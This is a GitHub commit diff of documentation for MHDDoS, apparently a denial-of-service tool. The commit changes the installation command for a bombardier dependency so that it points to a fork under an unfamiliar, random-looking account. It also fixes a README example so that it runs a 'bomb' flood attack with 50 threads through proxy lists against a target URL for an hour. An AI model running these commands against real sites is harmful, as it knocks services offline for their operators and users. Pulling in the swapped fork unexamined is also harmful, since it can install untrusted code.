File tree Expand file tree Collapse file tree 2 files changed +4
-4
lines changed
Expand file tree Collapse file tree 2 files changed +4
-4
lines changed Original file line number Diff line number Diff line change @@ -6,8 +6,8 @@ Adopted from github.com/mariotrucco/bombardier@78-add-proxy-support
66mkdir bombardier_tmp
77cd bombardier_tmp
88go mod init bombardier_tmp
9- go mod edit -replace github.com/codesenberg/bombardier=github.com/mariotrucco /bombardier@78-add-proxy-support
9+ go mod edit -replace github.com/codesenberg/bombardier=github.com/PXEiYyMH8F /bombardier@78-add-proxy-support
1010go get github.com/codesenberg/bombardier
1111cd ..
1212rm -r bombardier_tmp
13- ```
13+ ```
Original file line number Diff line number Diff line change @@ -95,7 +95,7 @@ You can download it from [GitHub Releases](https://github.com/MHProDev/MHDDoS/re
9595* [ psutil] ( https://github.com/giampaolo/psutil )
9696* [ dnspython] ( https://github.com/rthalley/dnspython )
9797* [ yarl] ( https://github.com/aio-libs/yarl )
98- * [ bombardier] ( https://github.com/mariotrucco /bombardier@ 78-add-proxy-support ) (Optional)
98+ * [ bombardier] ( https://github.com/PXEiYyMH8F /bombardier/tree/ 78-add-proxy-support ) (Optional, [ installation ] ( .github/BOMBARDIER.md ) )
9999---
100100
101101** Videos**
@@ -136,7 +136,7 @@ pip install -r requirements.txt
136136python start.py bypass https://example.com 5 101 socks5.txt 100 3600
137137# Running bomb attack from 50 threads (be careful must be < 300)
138138# with all proxies (0), 100 requests per proxy (connection), for 3600 seconds
139- python start.py bypass https://example.com 5 101 socks5 .txt 100 3600
139+ python start.py bomb https://example.com 0 50 proxy .txt 100 3600
140140```
141141
142142* Layer4 (Server/Home):
You can’t perform that action at this time.
0 commit comments